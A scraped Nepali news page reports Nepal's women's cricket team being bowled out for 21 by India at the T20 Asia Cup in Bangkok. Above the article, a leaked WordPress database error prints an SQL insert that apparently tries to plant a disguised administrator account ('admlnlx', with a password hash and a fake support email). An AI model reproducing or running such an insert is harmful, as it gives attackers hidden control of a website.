WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkwrKMtO.9K5lMC.613MOf3CisQinK0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 19:58:13', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १७–
खराब प्रदर्शनलाई निरन्तरता दिँदै नेपाली महिला क्रिकेट टोली एसिया कपको उपाधि होडबाट बाहिरिएको छ ।
नेपाली महिला क्रिकेट टोलीले नेपाली क्रिकेट इतिहासकै सबैभन्दा खराब प्रदर्शन गर्दै प्रतियोगिताको अन्त्य गरेको छ । थाइल्यान्डको बैककमा आयोजना भइरहेको टि–२० एसिया कपअन्तर्गत भारतविरूद्ध आज (शुक्रबार) सम्पन्न खेलमा नेपाल ९९ रनले पराजित भएको छ। प्रतियोगितामा नेपालको यो लगातार पाँचौ पराजय हो।
यसअघि श्रीलंकासँग २३ रन मात्र बनाएको नेपाल भारतविरूद्ध २१ रनमा अलआउट भयो। नेपाली महिला टोलीको अन्तर्राष्ट्रिय प्रतियोगितामा यो सबैभन्दा खराब प्रदर्शन हो।
भारतले पहिलो ब्याटिङ गर्दै ५ विकेटको क्षतिमा बनाएको १ सय २० रनलाई पछ्याउने क्रममा नेपाली महिला टोली निरीह देखिए। नेपालको तर्फबाट कुनै पनि खेलाडीले दोहोरो अंक कटाउन सकेनन्। सर्वाधिक रन नै अतिरिक्तबाट बनेको थियो। मध्यक्रममा सरिता मगरले बनाएको ६ रनको तुलनामा नेपालले अतिरिक्तबाट ७ रन जोडेको थियो।
पाँच खेलाडी शुन्यमा आउट भए। दुई खेलाडीले १ रन मात्र जोडे। ३ खेलाडी २ रन बनाएर आउट भए। भारतीय लेगस्पिनर पुनम पाण्डेले ३ विकेट लिइन्। नेपालका लागि कप्तान रुबिना क्षेत्रीले २, सिता रानामगर र करुना भण्डारीले १–१ विकेट लिएका थिए।